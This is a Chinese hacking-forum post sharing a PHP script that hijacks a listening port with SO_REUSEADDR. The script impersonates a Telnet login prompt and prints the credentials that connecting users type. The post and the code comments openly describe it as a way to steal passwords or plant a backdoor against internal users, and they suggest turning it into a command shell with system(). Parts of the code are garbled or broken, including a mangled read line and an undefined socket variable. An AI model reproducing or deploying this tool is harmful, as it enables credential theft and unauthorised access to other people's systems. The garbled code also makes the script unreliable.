切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
PHP下实现端口复用/劫持[复制链接]
发表于 2012-6-30 12:44:55 | 显示全部楼层 |!read_mode!
假如监听127.0.0.1 ,访问共网IP不受影响,假如监听公网IP,127。0。0。1等IP不受影响。
这个可以用于欺骗用户密码,因为原来的服务不可用了。或者留成针对内网用户的后门。
最后欢迎加MSN:CQXY[AT]21CN。NET赐教。


  1. #!/usr/bin/php -q
  2. #c0dz by Darkness[BST]
  3. #Team:www.bugkidz.org
  4. #E-mail:cqxy[at]21cn.net
  5. if ($argc != 3 || in_array($argc[1] , array('--help','-h','?')))
  6. {
  7. echo "Use:#./$argv[0] www.bugkidz.org 192.168.0.1 21\r\n";
  8. echo "c0dz By Darkness[BST]";
  9. exit;
  10. }
  11. error_reporting(E_ALL);
  12. set_time_limit(0);
  13. ob_implicit_flush();
  14. $host = $argv[1];
  15. $port = $argv[2];
  16. if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
  17. echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
  18. } /*建立SOCKET*/
  19. socket_set_option($sock,SOL_SOCKET,SO_REUSEADDR,1); /*设置SOCKET连接的属性为SO_REUSEADDR,这样才可以端口复用*/
  20. if (($ret = socket_bind($sock, $host, $port)) < 0) {
  21. echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
  22. }/*绑定端口*/
  23. if (($ret = socket_listen($sock, 5)) < 0) {
  24. echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
  25. } /*开始监听*/

  26. while(true) {
  27. if (($sniffer = socket_accept($sock)) < 0) {
  28. echo "socket_accept() failed: reason: " . socket_strerror($sniffer) . "\n";
  29. break;
  30. }
  31. if ($port == 23)
  32. {
  33. $txt = "Welcome to the Telnet Server\r\n";
  34. $txt .="User:\r\n";
  35. socket_write($sniffer, $txt, strlen($txt));
  36. } /*这里是伪装信息,把自己伪装成原来的TELNET服务器,这样来骗取密码*/
  37. while(true) {
  38. if(($buf _read($sniffer">=@socket_read($sniffer, 2048, PHP_BINARY_READ)) ==false)
  39. {
  40. break;
  41. }
  42. if (!$buf = trim($buf)) {
  43. continue;
  44. }

  45. if ($buf == '!quit') {
  46. break;
  47. }
  48. if ($buf == '!shutdown') {
  49. socket_close($sniffer);
  50. break 2; /*其实这里可以调用system(),搞成一个CMD后门,反正你想怎么改都可以*/
  51. }
  52. $sniff_data = "$buf\r\n";
  53. /* else socket_write($sniffer, $sniff_data, strlen($sniff_data));*/
  54. echo $sniff_data;
  55. /*输出字符串,这里可以加进文件处理,保存密码什么的*/
  56. }
  57. socket_close($sniffer);

  58. }
  59. socket_close($resock);
  60. socket_close($sock);
  61. ?>
复制代码
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
本站文章均来自网络,如有侵权,请联系028-86262244-200 QQ: 1585463984 我们将立即删除!


http://www.west999.com/info/html/wangluobiancheng/Phpbiancheng/20080224/22439.html

操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 19:59

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部